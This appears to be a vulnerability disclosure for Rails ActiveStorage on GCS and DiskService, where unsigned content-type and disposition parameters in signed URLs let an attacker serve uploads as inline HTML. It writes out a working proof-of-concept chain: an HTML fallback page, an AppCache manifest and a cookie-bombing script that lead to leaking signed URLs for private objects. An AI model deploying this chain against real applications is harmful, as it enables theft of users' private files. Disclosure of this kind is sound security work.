ActiveStorage
tries to force content-disposition: attachment
for a list of content-types, including text/html
. However, response-content-type
and response-content-disposition
in GCS and DiskService’s URLs aren’t signed, which means an attacker can modify them at will. This is not the case for Azure or S3.
This can be exploited using AppCache
and cookie bombing as follows:
ActiveStorage::Blob
<html>
<script>
alert('Your request to the page '+location.href+' is hijacked!');
</script>
</html>
Grab the service signed URL for it and modify content type and content disposition params to text/html
and inline
.
CACHE MANIFEST
FALLBACK:
/bucket_name/ [fallback_url from previous step]
In the same way, grab the signed service URL and modify content disposition and type to ensure it’s served inline and as text/cache-manifest
.
<html manifest="[manifest_url from the manifest above]">
Any requests to this bucket will be hijacked.
<script>
setTimeout(function(){
for(var i = 1e3; i>0; i--){document.cookie = i + '=' + Array(4e3).join('0') + '; path=/'};
}, 3000);
</script>
</html>
Grab the service URL for main.html
, modify content type and disposition to ensure it’s served as inline
and text/html
, and trick a user of the Rails app with access to ActiveStorage
attachments into clicking it.
Since it’ll be open inline and as HTML, the JS code to overflow the cookies for the service (storage.googleapis.com in the case of GCS) will be executed. Next time the user makes a request for a file under the same bucket as main.html
, googleapis.com will return an error due to the size of the cookie headers. This will be interpreted as being offline by the browser, which will offer the fallback specified in the manifest. The fallback.html
above will be opened inline and as HTML as well, and its JS code executed. That code can be made to send location.href
(the signed URL) to the attacker.
Gain access to signed URLs for private objects, which in practice means access to those objects, as signed URLs is all that is needed.